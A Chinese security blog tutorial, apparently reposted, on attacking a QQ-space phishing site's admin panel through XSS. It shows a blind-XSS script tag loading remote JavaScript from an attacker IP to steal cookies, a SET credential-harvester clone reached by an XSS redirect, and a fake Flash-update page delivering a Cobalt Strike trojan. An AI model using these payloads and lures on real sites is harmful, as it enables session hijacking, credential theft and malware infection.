作者:先知社区-国光

原文:https://xz.aliyun.com/t/8459

前言

前几天看到 B 站某 up 主投稿的视频「QQ被盗后发布赌博广告,我一气之下黑了他们网站」,看完后不禁感叹为啥自己没有那么好的运气......

实际上这就是一个中规中矩的 XSS 漏洞案例,在安全圈子里面应该也算是基本操作,正好博客以前没有记录过类似的文章,那么本文就来还原一下这个攻击过程。

鉴别网站

下面是一个经典的 QQ 空间钓鱼网站:

域名分析

钓鱼网站最直观的就是看域名,可以看到目标网站域名 :qq.xps.com 尽管域名中出现了 qq 字样,但是一级域名却是 xps.com 这一点就直接暴露了钓鱼网站的本性。

早期还有一种利用拉丁字母注册的域名伪造钓鱼网站的案例,这种就比较逼真了,下面国光简单列举一些:

OPPO 官网 真假域名

# 真域名
www.oppo.com# 假域名
www.οppο.com

Pornhub 官网真假域名

# 真域名
www.pornhub.com# 假域名
www.ρornhub.com

唯品会官网 真假域名

# 真域名
www.vip.com# 假域名
www.νip.com

关于这类域名就不再列举了,早期这种方法成功率是非常的高的,有时候甚至都可以欺骗到我们这种专业的信息安全从业者。

功能分析

钓鱼网站既然是要钓鱼的话,说那么多半还会有后台管理功能。

所以使用常规的目录扫描工具多半可以扫描出一些端倪出来:

dirsearch -u "http://qq.xps.com/" -e * -x 301

果然扫描出了这个 QQ 空间钓鱼网站的后台登录口了:http://qq.xps.com/admin/login.php

至此基本上已经可以确定这个目标网站就是传说中的钓鱼网站了,下面来看一下这个钓鱼网站是如何运作的吧。

钓鱼流程

小白用户前台输入自己的 QQ 账号和密码信息,点击登录后域名跳转到真正的 QQ 官网:

然后用户再输入自己的 QQ 账号和密码就可以成功登陆了。

目前很多钓鱼网站都是这种思路,这可以让被钓者产生一种自己第一次是密码不小心输入错误的错觉,从而放松警惕,妙啊!

真是妙蛙种子吃着妙脆角,妙进了米奇妙妙屋 妙到家了

然后钓鱼网站的管理员每天会到自己的 QQ 空间钓鱼管理中心里面看看今天又有哪些菜鸡上钩了:

可以看到上钩者的 QQ 号为:1314520 密码为:sbhac... 唉,不对劲?貌似自己被羞辱了一番......

攻击思路

本文主要是来梳理一下 XSS 常剑的攻击思路,关于 XSS 以为的思路不在本文的叙述范围内,另外如果有小伙伴要不错新的姿势的话欢迎评论区里面或者邮件留言,国光日后会继续完善本文的。

思路一:XSS 盲打

如果目标网站存在 XSS 的话且没有 httponly 防御 cookie 那么就可以直接盲打 XSS。

首先准备一个 XSS 靶场,国光这里比较推荐 Github 上面开源的蓝莲花 XSS 平台。

官方项目地址为:https://github.com/firesunCN/BlueLotus_XSSReceiver

可惜已经清空数据了,还好国光我 fork 了一份:

国光 fork 的项目地址为:https://github.com/sqlsec/BlueLotus_XSSReceiver

然后使用 XSS 平台里面的模块来生成一个 XSS payload:

<script src="http://10.20.24.244/xss/myjs/x.js"></script>

可以去掉多余的双引号:

<script src=http://10.20.24.244/xss/myjs/x.js></script>

然后回到钓鱼网站前台,在用户名或者密码出插入 payload(理论上来说 密码处成功率要高一点)

如果有表单长度限制的话,可以手工审查元素修改 input 的长度限制:

这样黑客攻击的步骤基本上就走完了,下面回到钓鱼网站管理员的视角。

钓鱼网站的搭建者到自己的 QQ 空间钓鱼管理中心里面看看今天又有哪些菜鸡上钩了:

发现真的有菜鸡上钩,密码居然是 1111111111 嘴角忍不住上仰。

此时他不知道的是,用户账号旁边实际上有一串 JS 代码被解析了,

而此时黑客在 XSS 平台里面可以直接看到管理员已经上钩了:

可以直接看到管理员的后台地址和 cookie 信息,拿到后台地址和 Cookie 信息就可以直接抓包替换 Cookie 登录到钓鱼网站的后台,这些基本操作国光我就不在啰嗦了,下面来说一下另一种思路。

思路二:SET 钓鱼

假设目标网站存在 httppnly 的话,我们拿到的 cookie 信息也是不完整的,所以传统的思路是行不通的,这种情况下该怎么办呢?

仔细想想,既然不能正面肛 httponly 的话,那么为什么不考虑绕过他呢?

下面国光主要描述一下如何使用 Kali Linux 里面的 set 社工工程学工具包来进行钓鱼。

SET 在 Kali Linux 里面的全称是 social engineering toolkit:

Github 项目地址为:https://github.com/trustedsec/social-engineer-toolkit

点击即可直接启动,首先会看到如下的菜单:

Select from the menu:1) Social-Engineering Attacks         # 社会工程攻击2) Penetration Testing (Fast-Track)   # 渗透测试(快速通道)3) Third Party Modules                # 第三方模块4) Update the Social-Engineer Toolkit # 更新 SET5) Update SET configuration           # 更新 SET 配置6) Help, Credits, and About           # 帮助99) Exit the Social-Engineer Toolkit   # 退出set> 1

选择 1 后进入到下面的菜单:

Select from the menu:1) Spear-Phishing Attack Vectors        # 鱼叉式网络钓鱼攻击2) Website Attack Vectors               # 网站攻击3) Infectious Media Generator           # 感染性介质生成4) Create a Payload and Listener        # 创建 Payload 和 监听器5) Mass Mailer Attack                   # 群发邮件6) Arduino-Based Attack Vector          # 基于 Arduino 的攻击7) Wireless Access Point Attack Vector  # 无线接入点攻击8) QRCode Generator Attack Vector       # 二维码生成器攻击9) Powershell Attack Vectors            # Powershell 攻击10) Third Party Modules                  # 第三方模块99) Return back to the main menu.        # 返回主菜单set> 2

选择 2 后进入到下面的菜单:

1) Java Applet Attack Method           # Java Applet 攻击2) Metasploit Browser Exploit Method   # Metasploit Browser 浏览器攻击3) Credential Harvester Attack Method  # 凭证窃取攻击4) Tabnabbing Attack Method            # 标签页劫持       5) Web Jacking Attack Method           # 网页劫持攻击6) Multi-Attack Web Method             # 综合网页攻击7) HTA Attack Method                   # HTA 攻击99) Return to Main Menu                 # 返回主菜单set:webattack> 3

选择 3 进入到下面的菜单:

1) Web Templates       # 网站模板2) Site Cloner         # 站点克隆3) Custom Import       # 自定义导入99) Return to Webattack Menu # 返回主菜单set:webattack> 2

选择 2 然后具体看下下面的操作:

这个时候一个假的钓鱼网站就制作完成了,访问 Kali Linux 的 80 端 10.20.25.39 效果如下:

这个登录入口和 qq.xps.com/admin/login.php 的登录口一模一样:

现在的任务就是想办法让管理员在假的网站里面输入网站的后台用户名和密码信息,那么该怎么诱导管理员点击呢?

对,聪明的网友肯定想到了,还是利用 XSS,准备下方的 payload,这个 XSS 的作用就是普通的链接跳转:

<script>window.location.href="http://10.20.25.39/"</script>

然后将这个 payload 插入到钓鱼网站的后台中:

此时管理员到自己的 QQ 空间钓鱼管理中心里面看看今天又有哪些菜鸡上钩了,结果没想到网站浏览器却跳转到了:10.20.25.39 页面,这个就是我们制作的假的QQ 空间钓鱼管理中心的登录界面。

如果管理员大意的话,这个时候会以为登录会话超期了,需要重新登录,就在我们假的网站后台里面输入了真正的密码:

我们这个假的网站也非常妙,登录后自动转发到正确的网站登录成功,真是学以致用呀~~

管理员放松警惕的同时,我们的 Kali Linux 里也窃取到管理员的明文账号和密码信息了:

拿到这个后台就可以成功登陆了,Bingo ~

当然如果管理员是一个有很高安全意识的人,可能是不会上当的,本案例仅供意淫参考使用,实际运用还是得看运气。

思路三:Flash 钓鱼

这也是 B 站 视频里面提到过的方法,首先我们需要准备一个钓鱼页面,这里在 Github 上搜索到了 2 个 相关的项目,下面分别展示一下:

项目地址:https://github.com/Wileysec/adobe-flash-phishing-page

模仿的 Flash Player 中文官网的页面

项目地址:https://github.com/r00tSe7en/Flash-Pop

这种的就要稍微激进一点,强迫症都会忍不住去点击下载的:

国光这里选择了第 2 种激进的方法,点击立即升级的这个按钮点击会下载好国光我准备好的 CS 木马。

如果管理员以为自己的 Flash 版本过低的话,可能会下载并运行这个木马:

这里偷懒了没有给 Flash.exe 添加图标伪造一下,关于图标伪造大家可以参考之前的文章:

为 Cobalt Strike exe 木马添加图标(https://www.sqlsec.com/2020/10/csexe.html)

如果顺利的话就会成功上线 CS:

总结

免责声明:本文出现的思路案例仅供网络安全学习和研究技术使用,禁止使用本文的攻击技术工具用于非法用途,否则后果自负,另外文中所使用的 QQ 空间钓鱼网站是人为修改的漏洞靶场。

渗透视频教程,免费领

XSS 实战攻击思路总结,看过的人都收藏了相关推荐

  1. XSS实战攻击思路总结

    前言 前几天看到B站up主公孙田浩投稿的视频「QQ被盗后发布赌博广告,我一气之下黑了他们网站」,看完后不禁感叹为啥自己没有那么好的运气......实际上这就是一个中规中矩的XSS漏洞案例,在安全圈子里 ...

  2. 「珍藏」老司机为你推荐10个炫酷的开源库,看完的人都收藏了

    前言 技术群里面经常有人问到一些炫酷的UI效果实现方法,有时候我都是给一个相同或者相似效果的Github链接,有同学私信给我说,大佬,怎么这些效果你都能找到?你是怎么搜索的,或者有其他什么秘方?会利用 ...

  3. 坐车看书的人都是在装逼?

    坐车看书的人都是在装逼? 字数1886 阅读38190 评论461 喜欢1017 长得帅也就罢了,还辣么喜欢看书,叫我如何不心动 [一] 坐车看书的人都是在装逼,有过这种想法的人一定不止我一个. 有阵 ...

  4. 东北人的幽默,《红男绿女》中经典对白,看过的人都明白

    东北人的幽默,<红男绿女>中经典对白,看过的人都明白,对白中存在大量东北话,呵呵 1.柏鑫问张楠:你喜欢我哪一点.   张楠:我喜欢你离我远一点. 2.羊总经常说:我的理想就是,等我老了~ ...

  5. 【学术相关】基金申请全盘攻略,看过的人都能中!

    为了解决各位年轻老师申请基金时遇到的各种各样的问题,本号为大家准备了常见问题解答,希望能帮助到大家,预祝大家2021年申请成功! 对问题的解答也仅限于个人理解仅供参考,不当之处请批评指正! 本文来源: ...

  6. java引用类型有啥_Java引用类型原理深度剖析,看完文章,90%的人都收藏了

    Java中一共有4种引用类型(其实还有一些其他的引用类型比如FinalReference):强引用.软引用.弱引用.虚引用.其中强引用就是我们经常使用的Object a = new Object(); ...

  7. 23 种设计模式的#羞羞#解释,听说能看懂的人都是泡妞高手

    作者:HChan 博客:zhuanlan.zhihu.com/p/100746724 01 工厂方法追 MM 少不了请吃饭了,麦当劳的鸡翅和肯德基的鸡翅都是 MM 爱吃的东西,虽然口味有所不同,但不管 ...

  8. 微信读书这样排版,看过的人都很难忘!

    欢迎大家前往腾讯云+社区,获取更多腾讯海量技术实践干货哦~ 本文由刘笑江发表于云+社区专栏 在 微信读书 App 中,排版引擎负责解析 EPUB 或 TXT 格式的书籍源文件,将排版后的书籍内容如文字 ...

  9. 世界上最诡异的12张图,看懂的人都惊呆了!

    点不见了 盯着中间的十字看,很快你会发现,闪烁的紫点变成了绿色的.更为奇妙的是,如果你不眨眼地看半分钟以上,所有紫点都消失不见,只有绿点一直在动! 握个手吧 你以为这只是一张简单的动图?NO NO,画 ...

最新文章

  1. linux 脚本案例,30个关于Shell脚本的经典案例(上)
  2. 如何设计APP版本号?
  3. java 方法 示例_Java集合syncedSet()方法与示例
  4. 算法五——字符串匹配(上)
  5. 搭建DNS主、从服务实验
  6. CPU vs. GPU
  7. 把数字翻译成字符串的方法数
  8. 基于微信小程序的智能推荐点餐系统(附全部代码)
  9. 自媒体短视频怎么制作?视频制作大神分享的超全教程,新手也能轻松上手!
  10. Writeup for 0CTF2017 web
  11. 路由器就能赚钱? 揭秘京东云无线宝背后的黑科技
  12. 简图 新聚合图床源码 自带鉴黄功能
  13. 字体图标的下载与使用
  14. springboot系列课程笔记-第四章-WEB开发
  15. 优酷 html flash播放器,优酷播放器提示没有安装flash插件的解决办法
  16. Boost读写锁:shared_mutex
  17. 关于pip安装virtualenv虚拟环境出现的Permission denied问题及虚拟环境安装步骤
  18. WPF中获取Canvas中控件的坐标方法
  19. CTF中文件上传题目整理总结
  20. token登录验证机制

热门文章

  1. 2008年春节前计划
  2. 计算机回收站怎么设计无法删除,无法删除文件夹
  3. 招行信用卡笔试编程题 — 考察树的节点个数C++
  4. Android 验证码和密码输入框,能自定义输入框个数和样式(连体,下划线和方形框) 类似微信支付宝的密码输入框等
  5. 考研路上的那些一战二战三战成功与失败的故事系列之十一
  6. 利用Python读取fasta文件并进行一系列操作(上)
  7. java八股文指的是什么_八股文指的是什么意思(带你全面认识八股文)
  8. Permutation function
  9. 联想小新Air14怎么关闭f1-f12快捷键设置
  10. Ubuntu桌面重命名